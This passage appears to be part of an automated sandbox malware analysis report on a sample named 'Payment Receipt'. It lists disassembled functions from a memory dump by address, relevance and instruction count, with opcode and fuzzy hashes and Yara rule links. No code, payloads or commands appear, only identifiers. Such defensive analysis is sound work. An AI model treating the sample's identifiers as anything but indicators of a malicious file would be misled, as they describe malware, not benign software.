                                                                      • Instruction Fuzzy Hash: 56310536D4051AAFEB16DA59CC55E6FBBB4FF80710F054169E901EB254D730AE00D7E0
                                                                      Function 0162892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0162895E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                      • API String ID: 0-702105204
                                                                      • Opcode ID: 66edc3c43d79db8d7f3853d1d28b68cb11c579c72ceb4580950730a7ce4572ca
                                                                      • Instruction ID: db245512bb15459ced16f101e9be746ed1984a528a31e767f644c28e4d48b7ce
                                                                      • Opcode Fuzzy Hash: 66edc3c43d79db8d7f3853d1d28b68cb11c579c72ceb4580950730a7ce4572ca
                                                                      • Instruction Fuzzy Hash: 8301F732B10A329FEB256F5E9C84B6A7BADFFC1694B04105DF64217651CB207841CF97
                                                                      Function 015DE8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f8c7158ce98f33cedc8a9a9dfc96ac99c65c2bec8d470ec28abc2fc6cad0283
                                                                      • Instruction ID: d6a2575976263556a20175317f0b9c334739ed2216c4dbf0c27c6b408df84499
                                                                      • Opcode Fuzzy Hash: 8f8c7158ce98f33cedc8a9a9dfc96ac99c65c2bec8d470ec28abc2fc6cad0283
                                                                      • Instruction Fuzzy Hash: 2F821472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                      Function 015E516C Relevance: .8, Instructions: 785COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d265845c7d78475b8dec7b5569429642e3acecd2b5bbc6bbd8dd97617a1c6e1
                                                                      • Instruction ID: 8b02338408328a2d79d4e7172967bdec6ebea84ab4fd5c7730705f1bb7bca626
                                                                      • Opcode Fuzzy Hash: 4d265845c7d78475b8dec7b5569429642e3acecd2b5bbc6bbd8dd97617a1c6e1
                                                                      • Instruction Fuzzy Hash: A862B33AD1464A9FCF29CF08D4940AEBBE2BE51318B49C55CC89B6F605E370BA54CB90
                                                                      Function 01642000 Relevance: .8, Instructions: 757COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3365065bce0caaca77d22428606c8d37830a0938a0be52c2c52b90c91bf23b6
                                                                      • Instruction ID: 3750a3a6de343fd1f491c12af13a435c73a9703366d39e1fbced6e2ddae237c0
                                                                      • Opcode Fuzzy Hash: b3365065bce0caaca77d22428606c8d37830a0938a0be52c2c52b90c91bf23b6
                                                                      • Instruction Fuzzy Hash: 5F429D756083428FE725CF68DCA0A6FBBE5BF88700F29492DFA8297250D771D845CB52
                                                                      Function 015F739A Relevance: .7, Instructions: 705COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93f6b00e88ecab765953318a5bf6fcece7aad8ff2e91a8c448a715a78af6f0b5
                                                                      • Instruction ID: d4a4c898edb941a3f80ae0cf35e27b0309c28e39e2565085b04f611bcaf032e5
                                                                      • Opcode Fuzzy Hash: 93f6b00e88ecab765953318a5bf6fcece7aad8ff2e91a8c448a715a78af6f0b5
                                                                      • Instruction Fuzzy Hash: 19428D71A006168FDB19CF59C890AAEBBF6FF8C314B24856DD652AF341D734E942CB90
                                                                      Function 015CB2C0 Relevance: .6, Instructions: 629COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 639fd7573e7f08bf8a4ea02b2bf71124f56414552dfc6ad7df8965f965c4ea56
                                                                      • Instruction ID: a899a895860e6d60bc17cc61c4db394b41e246c981fce85b39f0ca37d6eb2362
                                                                      • Opcode Fuzzy Hash: 639fd7573e7f08bf8a4ea02b2bf71124f56414552dfc6ad7df8965f965c4ea56
                                                                      • Instruction Fuzzy Hash: D8329E71E0021A9FDF14CFA8C895BAEBBB5FF94B54F18006DE805AB381E7359951CB90
                                                                      Function 01638158 Relevance: .6, Instructions: 617COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51166b39eb66b2bb94aaf2a54c118daba1ba342ccb122ad610c8bfadcc1caf7f
                                                                      • Instruction ID: 51fdef1d00592a2a0234e53a90928ff38181f9a42ac970fc333344ad85a7829e
                                                                      • Opcode Fuzzy Hash: 51166b39eb66b2bb94aaf2a54c118daba1ba342ccb122ad610c8bfadcc1caf7f
                                                                      • Instruction Fuzzy Hash: BE423A75A102198FEB25CF69CC81BEDBBF9BF88300F158199E949AB342D7349985CF50
                                                                      Function 015B2840 Relevance: .6, Instructions: 605COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf9c8b902f00c84761796dbae1661add7181887ae2238783e4656a436456f6fe
                                                                      • Instruction ID: f12c834263e953324ef3aa4bc7c4f28cca6b41e1bde3adc7cfd8d04c971d69ae
                                                                      • Opcode Fuzzy Hash: bf9c8b902f00c84761796dbae1661add7181887ae2238783e4656a436456f6fe
                                                                      • Instruction Fuzzy Hash: 4832BB70A007568BDB2ACF69CC447BEBBF2BF84304F24451DD58A9B385D735A962CB60
                                                                      Function 0164A118 Relevance: .6, Instructions: 591COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a475f0ee403e7f5bd2bdb146303487afb6a4963a239fefdee607730a5e6ec6e0
                                                                      • Instruction ID: 67358a71aa5cfc50d960f23bd21620aba5246f617c223339e3676a67a988d903
                                                                      • Opcode Fuzzy Hash: a475f0ee403e7f5bd2bdb146303487afb6a4963a239fefdee607730a5e6ec6e0
                                                                      • Instruction Fuzzy Hash: 4D22EF74284661ABEB25CFADC890376BBF1AF44300F08845DE9878F786E335E452DB60
                                                                      Function 016616CC Relevance: .6, Instructions: 571COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6dc290d21541449e3a90df80fadb968f9f7f7b6db8642b44322055ea366e3b1
                                                                      • Instruction ID: c8f04b248ea516e312944baa94323c13dda56cd0cc55aabe72e7ac29e14b3222
                                                                      • Opcode Fuzzy Hash: d6dc290d21541449e3a90df80fadb968f9f7f7b6db8642b44322055ea366e3b1
                                                                      • Instruction Fuzzy Hash: 6222CF35A002168FDB19CF59C890ABEB7FAFFCA304B24856DD955DB345DB30A942CB90
                                                                      Function 015CFB80 Relevance: .6, Instructions: 559COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d18e29f8991470abe70c450de4ce20f284909c5cfa15c32c2378e08d37700a
                                                                      • Instruction ID: 15fb1095e96a2536d1e449f5ebd56970c9baa91d8a56ccb2ae5d2c217fa6f6a4
                                                                      • Opcode Fuzzy Hash: a3d18e29f8991470abe70c450de4ce20f284909c5cfa15c32c2378e08d37700a
                                                                      • Instruction Fuzzy Hash: 5A2293759002069FDF15DFA8CC807AEB7B5FF84310F28856AE9159B389D734EA85CB90
                                                                      Function 015C8DBF Relevance: .6, Instructions: 554COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c861d17b771aee8f68d804febcbd3bce9271007513c0328a518f74b10e5020d
                                                                      • Instruction ID: 3bd4af9c5d40d1911e44b45b4135715a46f48cfde4cf00d3a8b9e5a413091b22
                                                                      • Opcode Fuzzy Hash: 9c861d17b771aee8f68d804febcbd3bce9271007513c0328a518f74b10e5020d
                                                                      • Instruction Fuzzy Hash: E5225D70E0011A9FCB1ACFD9C8809BEFBF2BF84704B15815AE955AB241E774ED41CBA4
                                                                      Function 015A6A50 Relevance: .5, Instructions: 548COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                                      • Instruction ID: 2ce6ea69956b1a30838ff2d2f6bb4e642a501a0713cf19ed04e62c7c0b7d1d75
                                                                      • Opcode Fuzzy Hash: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                                      • Instruction Fuzzy Hash: C732A271A01215CFDB29CF68C880BAEBBF1FF48310F588569E956AB791D774E841CB90
                                                                      Function 01662446 Relevance: .5, Instructions: 485COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0bb7c7bf84bfdf0c8ceb6fe03dae389bec0eb3335a25775e3373ac9f5f27d7fe
                                                                      • Instruction ID: 45539d47b891b56ddd3dc623f9a9e6c5199565838c2766170f416759284ae525
                                                                      • Opcode Fuzzy Hash: 0bb7c7bf84bfdf0c8ceb6fe03dae389bec0eb3335a25775e3373ac9f5f27d7fe
                                                                      • Instruction Fuzzy Hash: 8502E3746046528BD724CF2ECC60375BBF9AF85340B19859EE9D6CB382D338D856DB60
                                                                      Function 015F5630 Relevance: .5, Instructions: 458COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                      • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                      • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                      • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                      Function 016641A2 Relevance: .5, Instructions: 452COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 825707025e4d0acc7fd7654c29e2f52645f336926160f9ecc697b60e62d0ab6d
                                                                      • Instruction ID: f0482745f30cb9114f75d252aee83aefd532c675908c8f137ece83fab6793f0a
                                                                      • Opcode Fuzzy Hash: 825707025e4d0acc7fd7654c29e2f52645f336926160f9ecc697b60e62d0ab6d
                                                                      • Instruction Fuzzy Hash: 7A02A071E01219CFCF05CF98C8806ADBBBAFF98304F298169D556AB755EB30AD42CB50
                                                                      Function 0167B16B Relevance: .4, Instructions: 450COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3fb374330f28efc112fafd6aecd66fcde51d41ca1492c31159e9d5d6b2105b0
                                                                      • Instruction ID: cafefe18c4acac50dabf6eae0a9f78c657d2835c85a7dba9a6349a402bfd1f16
                                                                      • Opcode Fuzzy Hash: d3fb374330f28efc112fafd6aecd66fcde51d41ca1492c31159e9d5d6b2105b0
                                                                      • Instruction Fuzzy Hash: 5FF1F472E002158FDB18CFADCD9067EBBF6AF98210719816DD866DB385E734EA41CB50
                                                                      Function 0167A9A6 Relevance: .4, Instructions: 425COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14613a697ef271e2551b99e8fd3d07c8be57bb0847298adda15c788e99fc281c
                                                                      • Instruction ID: e63e852d68cc416a9233c5d352e5d7fc33cef260a658ed1054fe9acaa56f2d1b
                                                                      • Opcode Fuzzy Hash: 14613a697ef271e2551b99e8fd3d07c8be57bb0847298adda15c788e99fc281c
                                                                      • Instruction Fuzzy Hash: 49F1A273E005269BCB19DEA8C9A05BDFBF5AF54210B1D4269D856EB380D734EE41CB90
                                                                      Function 015C4A35 Relevance: .4, Instructions: 423COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                      • Instruction ID: 04aa80ec245e5a48b419f1b47d053e5279a78fe218fb192885a4aa5e6c9825cf
                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                      • Instruction Fuzzy Hash: 1DF15C74E0020A9FDB19DFD9C990AAEBBF5BF48B14F05852DE905AB350E774E841CB60
                                                                      Function 01652F30 Relevance: .4, Instructions: 412COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 114cfc1287848e5e3528cdf9321aba96d42f91c7c91b638d2af518ddfe9f099b
                                                                      • Instruction ID: a00f8013e2392ba78f41663d72953c59bff9a627e8d1d38d1f30617d222e80f8
                                                                      • Opcode Fuzzy Hash: 114cfc1287848e5e3528cdf9321aba96d42f91c7c91b638d2af518ddfe9f099b
                                                                      • Instruction Fuzzy Hash: DBE1E131A042869BDB64CFACDC506BEBBF1BF44750F08841EE896AB381D775A985CB50
                                                                      Function 0163892B Relevance: .4, Instructions: 386COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                                      • Instruction ID: 59baa22e5fe114c5858c3fe91a6f52b879415ef4c62400008b22d7159702b47d
                                                                      • Opcode Fuzzy Hash: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                                      • Instruction Fuzzy Hash: A4D1C371E0060A9BDF19CF69CC41AFEB7F9BFC8304F188269E956A7241D735E9068B50
                                                                      Function 015A65D0 Relevance: .4, Instructions: 383COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b8c7afc597a0c1681c8b965eae4ef9f5c26de58bb6a2bfbb722d2d4d928ee4c
                                                                      • Instruction ID: 4ae723b4600eb80c42b9789aa0c2b432fc2c67e8ee9ba3667a555e5ef75eb5f3
                                                                      • Opcode Fuzzy Hash: 3b8c7afc597a0c1681c8b965eae4ef9f5c26de58bb6a2bfbb722d2d4d928ee4c
                                                                      • Instruction Fuzzy Hash: 87E19071608342CFC715CF28C490A6EBBE0FF89314F59896DE9998B351EB31E905CB92
                                                                      Function 01598397 Relevance: .4, Instructions: 380COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdf1cbf640fccb705a23e72c9a1e34485ed565e2fd806c1d707e1bfb13c036ba
                                                                      • Instruction ID: c591dbc82ac292b584b87bd24bf82a9360d76153d2fad65c6b433c5d01c7beda
                                                                      • Opcode Fuzzy Hash: cdf1cbf640fccb705a23e72c9a1e34485ed565e2fd806c1d707e1bfb13c036ba
                                                                      • Instruction Fuzzy Hash: 47D1DE71A0020BDBDF14CF68C880ABEB7E5BF95204F14862DEA16DF280E735E954CB61
                                                                      Function 015CC6E0 Relevance: .4, Instructions: 367COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c738d640178a05e8fc9e64ef38a0765b85c02c8f76f90a331dc625c7ab095fd
                                                                      • Instruction ID: d9699d37402d0b49cabffe5416633cd0cffab66891a1dd34566eee0a329ff40c
                                                                      • Opcode Fuzzy Hash: 2c738d640178a05e8fc9e64ef38a0765b85c02c8f76f90a331dc625c7ab095fd
                                                                      • Instruction Fuzzy Hash: FAD17E31E041198FEB29CEDCC9453BEBBF1FB45B10F14842ED94AAF285C7B499828B45
                                                                      Function 015B38E0 Relevance: .3, Instructions: 349COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00e4ee96fb54590df7a5545b1de0021dd06979a228741e0c7647a05a9457f253
                                                                      • Instruction ID: b57acfc60cfcf5377613df4815fcf78f4382f5ce72a901ae062b0b2dcbc3276f
                                                                      • Opcode Fuzzy Hash: 00e4ee96fb54590df7a5545b1de0021dd06979a228741e0c7647a05a9457f253
                                                                      • Instruction Fuzzy Hash: E6E19075A00205DFDB19CF59C890AAEBBF5FF48310F248169E956EB395D730EA41CBA0
                                                                      Function 015CD2F0 Relevance: .3, Instructions: 341COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                      • Instruction ID: af872662711fbec9b0057fa9c49963c5bf8894345f93f5df52fa6b4adffb06cd
                                                                      • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                      • Instruction Fuzzy Hash: 9CB12722A109148BEB2E8E9CCCA137E6763FFD5610F19867DC9538F7D5D6788901C382
                                                                      Function 016795C3 Relevance: .3, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f2fd488e5c3a794b3ff788c576362c1bd5ce725a893a1538155f41b7c5d4bdf
                                                                      • Instruction ID: c74576081a20572e6aa15fbb50e7c4607dddd25e8797f6dc68f04d63a81752ac
                                                                      • Opcode Fuzzy Hash: 9f2fd488e5c3a794b3ff788c576362c1bd5ce725a893a1538155f41b7c5d4bdf
                                                                      • Instruction Fuzzy Hash: 2FB169B1D10126AFFB29CB24CC55FBBB6ECFB44754F044699B919E62C0DB709E848B60
                                                                      Function 01628243 Relevance: .3, Instructions: 322COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                      • Instruction ID: 303b1f9696d4022fb4797883a9fe1f8656460d39850efd7e69ec850dcbc59ba0
                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                      • Instruction Fuzzy Hash: 36B17174A00A15AFDB24DB98CD44AABBBFEBF85304F14845DEA42A7790DB34E905CF50
                                                                      Function 015B0535 Relevance: .3, Instructions: 300COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                      • Instruction ID: 8ae6b1b035d264c95dddbbe2fbaf068cfa0fbb979348ed84a66b91da4e797071
                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                      • Instruction Fuzzy Hash: 4FB19031604646AFDB26DB68C894BBFBBF6BF84200F144599E6529B3D1DB30ED41CB90
                                                                      Function 015A83C0 Relevance: .3, Instructions: 281COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c4ac2b38e0326a8bd9b5f0c3f5569ed978e0d63e175cd198613bacaea7958369
                                                                      • Instruction ID: cccbff339eaa7d5fddeff6af6cd7f5bf3287b3eaf0d2cf47b14c9a2a0fa61bd0
                                                                      • Opcode Fuzzy Hash: c4ac2b38e0326a8bd9b5f0c3f5569ed978e0d63e175cd198613bacaea7958369
                                                                      • Instruction Fuzzy Hash: DDC146746083419FE764CF19C884BAFB7E5BF88304F44496DE9898B391E774E908CB92
                                                                      Function 0159C427 Relevance: .3, Instructions: 280COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 010e4bdbd7ba6aa786bf9ce590479f8e526545d72041e91868eecb7521532b64
                                                                      • Instruction ID: 2bdd8018e7abf6220ecc6c94c5f07c7b5456eb770966fd2b21d54544f8f6f0ec
                                                                      • Opcode Fuzzy Hash: 010e4bdbd7ba6aa786bf9ce590479f8e526545d72041e91868eecb7521532b64
